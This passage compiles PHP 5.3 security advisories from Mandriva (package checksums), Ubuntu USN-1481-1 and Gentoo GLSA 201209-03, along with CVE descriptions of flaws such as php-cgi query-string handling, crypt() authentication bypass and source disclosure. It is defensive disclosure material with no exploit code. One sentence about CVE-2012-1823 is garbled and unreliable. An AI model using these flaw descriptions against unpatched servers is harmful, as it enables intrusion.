2010.1/x86_64/php-pdo_pgsql-5.3.13-0.1mdv2010.2.x86_64.rpm f1b25be0d7a2e6948dd6d95776da6f27 2010.1/x86_64/php-pdo_sqlite-5.3.13-0.1mdv2010.2.x86_64.rpm c61a1bc81075ebfc94e820984597774b 2010.1/x86_64/php-pgsql-5.3.13-0.1mdv2010.2.x86_64.rpm 11bed7992443f01305ad4ce8304e9f07 2010.1/x86_64/php-phar-5.3.13-0.1mdv2010.2.x86_64.rpm dd6008750a431325112944e3a5783d0c 2010.1/x86_64/php-posix-5.3.13-0.1mdv2010.2.x86_64.rpm f5531db71580b0c17c5796cfd79f4020 2010.1/x86_64/php-pspell-5.3.13-0.1mdv2010.2.x86_64.rpm 80c9841836ea5246babb676ce79adb9d 2010.1/x86_64/php-readline-5.3.13-0.1mdv2010.2.x86_64.rpm 6271ebd8132c7d94513646d0bbfedf15 2010.1/x86_64/php-recode-5.3.13-0.1mdv2010.2.x86_64.rpm 77e395b19c6068c941cc1ee1c89e15c6 2010.1/x86_64/php-session-5.3.13-0.1mdv2010.2.x86_64.rpm b310511e16b059f753cef3fbe39a35b0 2010.1/x86_64/php-shmop-5.3.13-0.1mdv2010.2.x86_64.rpm 70b99d0120ea8c6018a327996314ab49 2010.1/x86_64/php-snmp-5.3.13-0.1mdv2010.2.x86_64.rpm 33f829a30afaeab74203389d8a48a2d9 2010.1/x86_64/php-soap-5.3.13-0.1mdv2010.2.x86_64.rpm 64295e56e1c81c3322aa49bd1bf2d838 2010.1/x86_64/php-sockets-5.3.13-0.1mdv2010.2.x86_64.rpm 9afd6ba7da1e9ffa58a33c822eeb6a9d 2010.1/x86_64/php-sqlite3-5.3.13-0.1mdv2010.2.x86_64.rpm 8f8e7ee68199f5fdb8867b10d8cede5a 2010.1/x86_64/php-sqlite-5.3.13-0.1mdv2010.2.x86_64.rpm 84d824d25bcd058301b8a8cac4eece97 2010.1/x86_64/php-sybase_ct-5.3.13-0.1mdv2010.2.x86_64.rpm cdd27855aa2b685fba70fea949d0f8f5 2010.1/x86_64/php-sysvmsg-5.3.13-0.1mdv2010.2.x86_64.rpm 47714ed1a09513b0fa4016fed1faf374 2010.1/x86_64/php-sysvsem-5.3.13-0.1mdv2010.2.x86_64.rpm 878cc21a21bcb9120f0c60d0dc3c848d 2010.1/x86_64/php-sysvshm-5.3.13-0.1mdv2010.2.x86_64.rpm ed7017d81df4e68da01f9d790c5e9e75 2010.1/x86_64/php-tidy-5.3.13-0.1mdv2010.2.x86_64.rpm e2dbcbefd496f408e56c5072938f62d6 2010.1/x86_64/php-tokenizer-5.3.13-0.1mdv2010.2.x86_64.rpm c629479463912ae1d91c4399e5b05f67 2010.1/x86_64/php-wddx-5.3.13-0.1mdv2010.2.x86_64.rpm 5a71b4a2a66aa994585f3372f13ad969 2010.1/x86_64/php-xml-5.3.13-0.1mdv2010.2.x86_64.rpm 9e99f81386d263bf395a4462ce3333f8 2010.1/x86_64/php-xmlreader-5.3.13-0.1mdv2010.2.x86_64.rpm 76c565d3fdcba0133b6c25a914a4fed3 2010.1/x86_64/php-xmlrpc-5.3.13-0.1mdv2010.2.x86_64.rpm af3b32c6d60342fb5c7a7c455f647f34 2010.1/x86_64/php-xmlwriter-5.3.13-0.1mdv2010.2.x86_64.rpm 31a1efcba8488b85ec31054bea181262 2010.1/x86_64/php-xsl-5.3.13-0.1mdv2010.2.x86_64.rpm d3b08c3d48baefa3ee14632b876100fb 2010.1/x86_64/php-zip-5.3.13-0.1mdv2010.2.x86_64.rpm a6a3b117484b1bb2e7d449c08fa49b46 2010.1/x86_64/php-zlib-5.3.13-0.1mdv2010.2.x86_64.rpm cd0e0682df60061148366ab6b10394d2 2010.1/SRPMS/apache-mod_php-5.3.13-0.1mdv2010.2.src.rpm f454d177e9bd631df2a4eeca3d33fe38 2010.1/SRPMS/php-5.3.13-0.1mdv2010.2.src.rpm 281be8fe2bb8cd404ade445f64c616da 2010.1/SRPMS/php-ini-5.3.13-0.1mdv2010.2.src.rpm Mandriva Linux 2011: 35cdd956ce62db7548d2626d8a8f7ae8 2011/i586/apache-mod_php-5.3.13-0.1-mdv2011.0.i586.rpm dd02a276ddca3ae7ad754e19a41e8ff8 2011/i586/libphp5_common5-5.3.13-0.1-mdv2011.0.i586.rpm 7a8feff11aa910f94074c57b54a124d6 2011/i586/php-bcmath-5.3.13-0.1-mdv2011.0.i586.rpm 3c70edc391c1c8fb7845f81f3b3f5bac 2011/i586/php-bz2-5.3.13-0.1-mdv2011.0.i586.rpm d8020203023aaf02a30b22559d5a67c7 2011/i586/php-calendar-5.3.13-0.1-mdv2011.0.i586.rpm e0f010a7d61cf27e13a486ff6e5d6ce4 2011/i586/php-cgi-5.3.13-0.1-mdv2011.0.i586.rpm 345ee6e60bc1973f0049ab25f7dc3557 2011/i586/php-cli-5.3.13-0.1-mdv2011.0.i586.rpm c4e851c0260ad96797ca56deb2b6f3c7 2011/i586/php-ctype-5.3.13-0.1-mdv2011.0.i586.rpm 073d81d6531862861015cf7f53173045 2011/i586/php-curl-5.3.13-0.1-mdv2011.0.i586.rpm 1330fd10a3bdd3787913db7795054819 2011/i586/php-dba-5.3.13-0.1-mdv2011.0.i586.rpm b6d0fefa9206b7cd3f4c73744c324906 2011/i586/php-devel-5.3.13-0.1-mdv2011.0.i586.rpm 32a9567d7a61d6f35654e8d33baec58a 2011/i586/php-doc-5.3.13-0.1-mdv2011.0.i586.rpm 149566d373265e732f1ec3140d11cac2 2011/i586/php-dom-5.3.13-0.1-mdv2011.0.i586.rpm 6f4b1fe24a35809c93e9489347c448bb 2011/i586/php-enchant-5.3.13-0.1-mdv2011.0.i586.rpm 44f27021f7ff8202f5f34a8b0720be5b 2011/i586/php-exif-5.3.13-0.1-mdv2011.0.i586.rpm 5d32e3e7dc217fd69b6dc99dffb747f7 2011/i586/php-fileinfo-5.3.13-0.1-mdv2011.0.i586.rpm 043c17fad24c3113600799c63c5dde18 2011/i586/php-filter-5.3.13-0.1-mdv2011.0.i586.rpm 08c16e8ec2f1c821df8090c38c43809b 2011/i586/php-fpm-5.3.13-0.1-mdv2011.0.i586.rpm 209b4baf966b45cb48790e7a020b1aa9 2011/i586/php-ftp-5.3.13-0.1-mdv2011.0.i586.rpm eac85767ff89fcf822b2c2cf408b2aca 2011/i586/php-gd-5.3.13-0.1-mdv2011.0.i586.rpm 7c7c5ab6370c934b727dac2ad1c9bd33 2011/i586/php-gettext-5.3.13-0.1-mdv2011.0.i586.rpm babb1410dd897504ec526243789fd749 2011/i586/php-gmp-5.3.13-0.1-mdv2011.0.i586.rpm 63feb83eda18663f3ae28fee522a79c8 2011/i586/php-hash-5.3.13-0.1-mdv2011.0.i586.rpm a8aad04e3c20f9223832632f412c4c69 2011/i586/php-iconv-5.3.13-0.1-mdv2011.0.i586.rpm 22f5f2b807af8ea7445e8682f6718ab2 2011/i586/php-imap-5.3.13-0.1-mdv2011.0.i586.rpm ff780d80135cc18647edecdde6b77e16 2011/i586/php-ini-5.3.13-0.1-mdv2011.0.i586.rpm 10475ddafeeb384ae3afb7f5d2d1afa8 2011/i586/php-intl-5.3.13-0.1-mdv2011.0.i586.rpm e3261da452695aed46718ec06a1f17ed 2011/i586/php-json-5.3.13-0.1-mdv2011.0.i586.rpm f6238f4f4566582418666333eb797994 2011/i586/php-ldap-5.3.13-0.1-mdv2011.0.i586.rpm 9ae1d9fc8320fa272fa56484f425e7d8 2011/i586/php-mbstring-5.3.13-0.1-mdv2011.0.i586.rpm 86710277f0bca955ced6610b199fcf16 2011/i586/php-mcrypt-5.3.13-0.1-mdv2011.0.i586.rpm a9dad85e7658b897bcd9a3c088a71168 2011/i586/php-mssql-5.3.13-0.1-mdv2011.0.i586.rpm 66063a764c3a2b90143c5653c0f1dd2c 2011/i586/php-mysql-5.3.13-0.1-mdv2011.0.i586.rpm c7993bdf0b9ceaf4f2fa86dbc558ddfb 2011/i586/php-mysqli-5.3.13-0.1-mdv2011.0.i586.rpm afcd3e1e62498bffaa9432c5d5c505f5 2011/i586/php-mysqlnd-5.3.13-0.1-mdv2011.0.i586.rpm 21a837c5413d3e89b7747b70b343ff39 2011/i586/php-odbc-5.3.13-0.1-mdv2011.0.i586.rpm 9653980157e82a7cc1fcb428e6a11831 2011/i586/php-openssl-5.3.13-0.1-mdv2011.0.i586.rpm 2a7283323df15b449a0911147e4e120a 2011/i586/php-pcntl-5.3.13-0.1-mdv2011.0.i586.rpm 5943398e22f4b3aab9fb741e7b6a8014 2011/i586/php-pdo-5.3.13-0.1-mdv2011.0.i586.rpm 4a8632f0605a849c61148479c3dce11c 2011/i586/php-pdo_dblib-5.3.13-0.1-mdv2011.0.i586.rpm 90bfc85fce2cf88d5cc7e9d383bac674 2011/i586/php-pdo_mysql-5.3.13-0.1-mdv2011.0.i586.rpm 13a2e35fe9389ceff1bd86915d4fbb45 2011/i586/php-pdo_odbc-5.3.13-0.1-mdv2011.0.i586.rpm bd5ac6d3de510f5648e0796262ee0284 2011/i586/php-pdo_pgsql-5.3.13-0.1-mdv2011.0.i586.rpm c8a144f194b2e263d30d42549ef72df7 2011/i586/php-pdo_sqlite-5.3.13-0.1-mdv2011.0.i586.rpm 9fc72c845adc2c8b526ccda1045e95cb 2011/i586/php-pgsql-5.3.13-0.1-mdv2011.0.i586.rpm ceed9de56ba7babbb1103c0505360ae8 2011/i586/php-phar-5.3.13-0.1-mdv2011.0.i586.rpm 99df22a88e7ec65277c5f1d67946b674 2011/i586/php-posix-5.3.13-0.1-mdv2011.0.i586.rpm 2a7c90e39eaed912fd8ef49d5edcf3b0 2011/i586/php-pspell-5.3.13-0.1-mdv2011.0.i586.rpm b4f54f67b9372e1bef78b6a40a756d31 2011/i586/php-readline-5.3.13-0.1-mdv2011.0.i586.rpm c3ab166b9fc83521a75c13dff80f3a56 2011/i586/php-recode-5.3.13-0.1-mdv2011.0.i586.rpm a6c67fe24586ad45656a0e11906e7bb3 2011/i586/php-session-5.3.13-0.1-mdv2011.0.i586.rpm 39dd1f3c8218f0537aad8f03aa96b833 2011/i586/php-shmop-5.3.13-0.1-mdv2011.0.i586.rpm 7d516b28e8f45f06883657d93d152c31 2011/i586/php-snmp-5.3.13-0.1-mdv2011.0.i586.rpm 511c2eadd6584227584704adf97150e9 2011/i586/php-soap-5.3.13-0.1-mdv2011.0.i586.rpm d2bb4858eb41257b9e3c72b385b55fed 2011/i586/php-sockets-5.3.13-0.1-mdv2011.0.i586.rpm ef20af5ac9def94fc4db18e4e9ef80f3 2011/i586/php-sqlite3-5.3.13-0.1-mdv2011.0.i586.rpm d87d2f151f37050dd9f3d1fb66cc5be6 2011/i586/php-sqlite-5.3.13-0.1-mdv2011.0.i586.rpm 1214cb4bc37c7fb285dd6c2f00411904 2011/i586/php-sybase_ct-5.3.13-0.1-mdv2011.0.i586.rpm 1bd2a3a7f3408e7e304190e4145cec7f 2011/i586/php-sysvmsg-5.3.13-0.1-mdv2011.0.i586.rpm 602e9fbc2dd26d526709da1fbb5f43a3 2011/i586/php-sysvsem-5.3.13-0.1-mdv2011.0.i586.rpm 1f4d61a55c51175890bf3fe8da58178b 2011/i586/php-sysvshm-5.3.13-0.1-mdv2011.0.i586.rpm 7f81e3126928fd1e48e61a04e978e549 2011/i586/php-tidy-5.3.13-0.1-mdv2011.0.i586.rpm a2ea94863a07932b8cc8adfaf9984801 2011/i586/php-tokenizer-5.3.13-0.1-mdv2011.0.i586.rpm 7ca9553c6d0280546bc198cf7e349fd0 2011/i586/php-wddx-5.3.13-0.1-mdv2011.0.i586.rpm 2657cd50ab3d1ed89c40dd022b18a78a 2011/i586/php-xml-5.3.13-0.1-mdv2011.0.i586.rpm 4484a28aa070a5507ca51b7b6ccd9c4f 2011/i586/php-xmlreader-5.3.13-0.1-mdv2011.0.i586.rpm fb655f70ba8fd02cb283c685fb32198d 2011/i586/php-xmlrpc-5.3.13-0.1-mdv2011.0.i586.rpm 595eb1d07062b9ea1cbfa4db0c858b24 2011/i586/php-xmlwriter-5.3.13-0.1-mdv2011.0.i586.rpm 13c04bf3f0134e29372d595589f59193 2011/i586/php-xsl-5.3.13-0.1-mdv2011.0.i586.rpm 0a98ea3d088772271f96eeb7a5f23ba2 2011/i586/php-zip-5.3.13-0.1-mdv2011.0.i586.rpm e5242f7e29696cf3f9a80eb65ac97184 2011/i586/php-zlib-5.3.13-0.1-mdv2011.0.i586.rpm 43577b68968398f3e83bbb150c2ba4dd 2011/SRPMS/apache-mod_php-5.3.13-0.1.src.rpm 75c0847b9bfff7a4ecf5f5097e39b5e0 2011/SRPMS/php-5.3.13-0.1.src.rpm daa6819e438adce22445ffb6f25c10f0 2011/SRPMS/php-ini-5.3.13-0.1.src.rpm Mandriva Linux 2011/X86_64: 6f1b882d07cd219f673c90396542719e 2011/x86_64/apache-mod_php-5.3.13-0.1-mdv2011.0.x86_64.rpm 11c80f46a5669769a85ef8f391d07a70 2011/x86_64/lib64php5_common5-5.3.13-0.1-mdv2011.0.x86_64.rpm 7e4e71c5b17031412c13ea2d9b2477c5 2011/x86_64/php-bcmath-5.3.13-0.1-mdv2011.0.x86_64.rpm 528be2af28cf1a4843850e1b565c3898 2011/x86_64/php-bz2-5.3.13-0.1-mdv2011.0.x86_64.rpm 39b482e7037283b454056f4882d5917b 2011/x86_64/php-calendar-5.3.13-0.1-mdv2011.0.x86_64.rpm 9829b1d862405439321b3ecbfb4c7ea1 2011/x86_64/php-cgi-5.3.13-0.1-mdv2011.0.x86_64.rpm 5e705973df7b6c201fabeb2c75d3a74a 2011/x86_64/php-cli-5.3.13-0.1-mdv2011.0.x86_64.rpm eb3b69da40fb3992024aa0a9fea15a8d 2011/x86_64/php-ctype-5.3.13-0.1-mdv2011.0.x86_64.rpm a7fd1763425d19677b6adc88a835770f 2011/x86_64/php-curl-5.3.13-0.1-mdv2011.0.x86_64.rpm 0a4712efbe6fd4e1d2590842f620982c 2011/x86_64/php-dba-5.3.13-0.1-mdv2011.0.x86_64.rpm ca749d3257f0bb0595a6495816d17c29 2011/x86_64/php-devel-5.3.13-0.1-mdv2011.0.x86_64.rpm 56a0d712c402bcddcaba739f35ea07a6 2011/x86_64/php-doc-5.3.13-0.1-mdv2011.0.x86_64.rpm 2a6cf45b3a94ae3e571e3dbcbbc08804 2011/x86_64/php-dom-5.3.13-0.1-mdv2011.0.x86_64.rpm 0f109c681babe75db077f8d9af926f85 2011/x86_64/php-enchant-5.3.13-0.1-mdv2011.0.x86_64.rpm 7d419c4fd0f8180bb777b4b198dbf192 2011/x86_64/php-exif-5.3.13-0.1-mdv2011.0.x86_64.rpm befa5de9e5e4a3a2ab04a4899a0c654e 2011/x86_64/php-fileinfo-5.3.13-0.1-mdv2011.0.x86_64.rpm ef19b2adb8544747b6dbc673d5b758cd 2011/x86_64/php-filter-5.3.13-0.1-mdv2011.0.x86_64.rpm 42952a220d307fab9e88012a0db43ecd 2011/x86_64/php-fpm-5.3.13-0.1-mdv2011.0.x86_64.rpm 40c04426bafdec1b7ac6efd7e80112e3 2011/x86_64/php-ftp-5.3.13-0.1-mdv2011.0.x86_64.rpm 4fb018ed2383c082d45e4b75a346d588 2011/x86_64/php-gd-5.3.13-0.1-mdv2011.0.x86_64.rpm 7237c26a2db73c6a115fc4e035ecb0f2 2011/x86_64/php-gettext-5.3.13-0.1-mdv2011.0.x86_64.rpm 1a474b43b899509ba9516fa042fe1ddd 2011/x86_64/php-gmp-5.3.13-0.1-mdv2011.0.x86_64.rpm 28e8e4748273a5ccaeb65b54d666402f 2011/x86_64/php-hash-5.3.13-0.1-mdv2011.0.x86_64.rpm d3f5e9dfc04ce0ad319884c2501529c4 2011/x86_64/php-iconv-5.3.13-0.1-mdv2011.0.x86_64.rpm c166f30d0bab63ab66c91fdc7f23109e 2011/x86_64/php-imap-5.3.13-0.1-mdv2011.0.x86_64.rpm c2a6c0df9bdb831fa633b00afe1656ca 2011/x86_64/php-ini-5.3.13-0.1-mdv2011.0.x86_64.rpm 8ef06e0d3bc50c6af030273db341f33f 2011/x86_64/php-intl-5.3.13-0.1-mdv2011.0.x86_64.rpm 5e59fb195dd577622ba638e6f61301ce 2011/x86_64/php-json-5.3.13-0.1-mdv2011.0.x86_64.rpm 51d4d134118097c396fd9ae22658fd95 2011/x86_64/php-ldap-5.3.13-0.1-mdv2011.0.x86_64.rpm 43089444e735a7fb955f4b2073a89b8e 2011/x86_64/php-mbstring-5.3.13-0.1-mdv2011.0.x86_64.rpm 67cb0bb2abf2ac499616a9f6b67e42a4 2011/x86_64/php-mcrypt-5.3.13-0.1-mdv2011.0.x86_64.rpm 6167541236c972e1b3ca07ab4e3aa435 2011/x86_64/php-mssql-5.3.13-0.1-mdv2011.0.x86_64.rpm 8169e0c8a9121ed5b088e50f729a08f2 2011/x86_64/php-mysql-5.3.13-0.1-mdv2011.0.x86_64.rpm a9f88ce7ae03e6c9614bbbe77badd211 2011/x86_64/php-mysqli-5.3.13-0.1-mdv2011.0.x86_64.rpm 09ffa27ee341ea0f316c001302dc6b4f 2011/x86_64/php-mysqlnd-5.3.13-0.1-mdv2011.0.x86_64.rpm 52eca2dca4ad432fdb9ca2a42f8af637 2011/x86_64/php-odbc-5.3.13-0.1-mdv2011.0.x86_64.rpm f6e46b6f5ad8a961cbfde8b8e767054a 2011/x86_64/php-openssl-5.3.13-0.1-mdv2011.0.x86_64.rpm 3dd5efd7a83830669edf081f84a6ddd0 2011/x86_64/php-pcntl-5.3.13-0.1-mdv2011.0.x86_64.rpm f000fb58640165fa93eb8939c88f51b9 2011/x86_64/php-pdo-5.3.13-0.1-mdv2011.0.x86_64.rpm e91e95bb78ee4ccc6edc8a676cf83331 2011/x86_64/php-pdo_dblib-5.3.13-0.1-mdv2011.0.x86_64.rpm 82ca0b0fa4daa2d13d351f57cac4b1ad 2011/x86_64/php-pdo_mysql-5.3.13-0.1-mdv2011.0.x86_64.rpm 2a2e4cf2e7b3d6c718072e34bbf1f4d5 2011/x86_64/php-pdo_odbc-5.3.13-0.1-mdv2011.0.x86_64.rpm bae3bd360ca8da31e3444555b1ba5984 2011/x86_64/php-pdo_pgsql-5.3.13-0.1-mdv2011.0.x86_64.rpm 265ffe4fec20f1a276a4ae598f897097 2011/x86_64/php-pdo_sqlite-5.3.13-0.1-mdv2011.0.x86_64.rpm de5791ef4c4f09caf289efcc2946bd40 2011/x86_64/php-pgsql-5.3.13-0.1-mdv2011.0.x86_64.rpm 3e5a5c8d71d73d792f6a9c5d1d1ff0e0 2011/x86_64/php-phar-5.3.13-0.1-mdv2011.0.x86_64.rpm 1b106b0000d8cf09217a8c6066a08abe 2011/x86_64/php-posix-5.3.13-0.1-mdv2011.0.x86_64.rpm 4142e252a6e80033b49966678333d4fc 2011/x86_64/php-pspell-5.3.13-0.1-mdv2011.0.x86_64.rpm 2eaa627598b484e870a745dfce89561c 2011/x86_64/php-readline-5.3.13-0.1-mdv2011.0.x86_64.rpm 16aa5e0d0038dad164fd251584267b25 2011/x86_64/php-recode-5.3.13-0.1-mdv2011.0.x86_64.rpm 1f2221028312e63a8fe0153b0f37268d 2011/x86_64/php-session-5.3.13-0.1-mdv2011.0.x86_64.rpm 08339bda25dfc15853d8f4f3093906b5 2011/x86_64/php-shmop-5.3.13-0.1-mdv2011.0.x86_64.rpm af74d89511d56956fd18f47588c8134a 2011/x86_64/php-snmp-5.3.13-0.1-mdv2011.0.x86_64.rpm a60760ee2c728bcd933f7f129918e20f 2011/x86_64/php-soap-5.3.13-0.1-mdv2011.0.x86_64.rpm 23edc8e373f493137a741d3f5b8a776f 2011/x86_64/php-sockets-5.3.13-0.1-mdv2011.0.x86_64.rpm 0ee3559a3748ba690ee5c4f99a324b1e 2011/x86_64/php-sqlite3-5.3.13-0.1-mdv2011.0.x86_64.rpm a4b3e977bffee9f122cb6e9582edb3f1 2011/x86_64/php-sqlite-5.3.13-0.1-mdv2011.0.x86_64.rpm edcf9dd12733f50cc808a336b26e0fe2 2011/x86_64/php-sybase_ct-5.3.13-0.1-mdv2011.0.x86_64.rpm d6cd75e157f0b6b026444a1407cf90a7 2011/x86_64/php-sysvmsg-5.3.13-0.1-mdv2011.0.x86_64.rpm 0c283bd1ae67f256a6e776f35e36b30c 2011/x86_64/php-sysvsem-5.3.13-0.1-mdv2011.0.x86_64.rpm 85f7cb718011e2ff913ce142a12a6343 2011/x86_64/php-sysvshm-5.3.13-0.1-mdv2011.0.x86_64.rpm 63b205689a9cb3929379ce8c6415fecc 2011/x86_64/php-tidy-5.3.13-0.1-mdv2011.0.x86_64.rpm addd08fffff1581bfa703aeba53c5566 2011/x86_64/php-tokenizer-5.3.13-0.1-mdv2011.0.x86_64.rpm 138500dc24f46346ae847fc2f56ca7a7 2011/x86_64/php-wddx-5.3.13-0.1-mdv2011.0.x86_64.rpm 27801c8421becc9030eb1e2e06342efe 2011/x86_64/php-xml-5.3.13-0.1-mdv2011.0.x86_64.rpm 1fefd162d7a627212ccca1ecda6ccdf2 2011/x86_64/php-xmlreader-5.3.13-0.1-mdv2011.0.x86_64.rpm 2e6d1bbc2319425bfe20b189f4fe4b79 2011/x86_64/php-xmlrpc-5.3.13-0.1-mdv2011.0.x86_64.rpm 421888369bc51fcfcb7a0fcedb23e3e4 2011/x86_64/php-xmlwriter-5.3.13-0.1-mdv2011.0.x86_64.rpm f5d79e3adf80fadf2f185db98ec3b142 2011/x86_64/php-xsl-5.3.13-0.1-mdv2011.0.x86_64.rpm e126fa1b8d8f0a7c18bae56a00345299 2011/x86_64/php-zip-5.3.13-0.1-mdv2011.0.x86_64.rpm a8492adb1cc9cd92d2771d151161ac2e 2011/x86_64/php-zlib-5.3.13-0.1-mdv2011.0.x86_64.rpm 43577b68968398f3e83bbb150c2ba4dd 2011/SRPMS/apache-mod_php-5.3.13-0.1.src.rpm 75c0847b9bfff7a4ecf5f5097e39b5e0 2011/SRPMS/php-5.3.13-0.1.src.rpm daa6819e438adce22445ffb6f25c10f0 2011/SRPMS/php-ini-5.3.13-0.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPq4WAmqjQ0CJFipgRAihWAKCc3667vbSD/ihxb7LB9g9x2C+bnQCg89XH JTVUFGYH3hR84ZM7EV65I9g= =hQaF -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ============================================================================ Ubuntu Security Notice USN-1481-1 June 19, 2012 php5 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Several security issues were fixed in PHP. Software Description: - php5: HTML-embedded scripting language interpreter Details: It was discovered that PHP incorrectly handled certain Tidy::diagnose operations on invalid objects. A remote attacker could use this flaw to cause PHP to crash, leading to a denial of service. (CVE-2012-0781) It was discovered that PHP incorrectly handled certain multi-file upload filenames. A remote attacker could use this flaw to cause a denial of service, or to perform a directory traversal attack. (CVE-2012-1172) Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain Unicode characters in passwords passed to the crypt() function. A remote attacker could possibly use this flaw to bypass authentication. (CVE-2012-2143) It was discovered that a Debian/Ubuntu specific patch caused PHP to incorrectly handle empty salt strings. A remote attacker could possibly use this flaw to bypass authentication. This issue only affected Ubuntu 10.04 LTS and Ubuntu 11.04. (CVE-2012-2317) It was discovered that PHP, when used as a stand alone CGI processor for the Apache Web Server, did not properly parse and filter query strings. Configurations using mod_php5 and FastCGI were not vulnerable. (CVE-2012-2335, CVE-2012-2336) Alexander Gavrun discovered that the PHP Phar extension incorrectly handled certain malformed TAR files. (CVE-2012-2386) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: php5 5.3.10-1ubuntu3.2 Ubuntu 11.10: php5 5.3.6-13ubuntu3.8 Ubuntu 11.04: php5 5.3.5-1ubuntu7.10 Ubuntu 10.04 LTS: php5 5.3.2-1ubuntu4.17 Ubuntu 8.04 LTS: php5 5.2.4-2ubuntu5.25 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1481-1 CVE-2012-0781, CVE-2012-1172, CVE-2012-2143, CVE-2012-2317, CVE-2012-2335, CVE-2012-2336, CVE-2012-2386 Package Information: https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.2 https://launchpad.net/ubuntu/+source/php5/5.3.6-13ubuntu3.8 https://launchpad.net/ubuntu/+source/php5/5.3.5-1ubuntu7.10 https://launchpad.net/ubuntu/+source/php5/5.3.2-1ubuntu4.17 https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.25

sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823. This vulnerability CVE-2012-1823 Vulnerability due to insufficient fix for.Service operation disruption by placing command line options in query strings by a third party ( Resource consumption ) There is a possibility of being put into a state. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: September 24, 2012 Bugs: #384301, #396311, #396533, #399247, #399567, #399573, #401997, #410957, #414553, #421489, #427354, #429630 ID: 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in PHP, the worst of which lead to remote execution of arbitrary code. Background ========== PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/php < 5.3.15 >= 5.3.15 < 5.4.5 >= 5.4.5 ------------------------------------------------------------------- # Package 1 only applies to users of these architectures: arm Description =========== Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All PHP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15" All PHP users on ARM should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5" References ========== [ 1 ] CVE-2011-1398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398 [ 2 ] CVE-2011-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379 [ 3 ] CVE-2011-4566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566 [ 4 ] CVE-2011-4885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885 [ 5 ] CVE-2012-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057 [ 6 ] CVE-2012-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788 [ 7 ] CVE-2012-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789 [ 8 ] CVE-2012-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830 [ 9 ] CVE-2012-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831 [ 10 ] CVE-2012-1172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172 [ 11 ] CVE-2012-1823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823 [ 12 ] CVE-2012-2143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143 [ 13 ] CVE-2012-2311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311 [ 14 ] CVE-2012-2335 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335 [ 15 ] CVE-2012-2336 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336 [ 16 ] CVE-2012-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386 [ 17 ] CVE-2012-2688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688 [ 18 ] CVE-2012-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365 [ 19 ] CVE-2012-3450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201209-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. 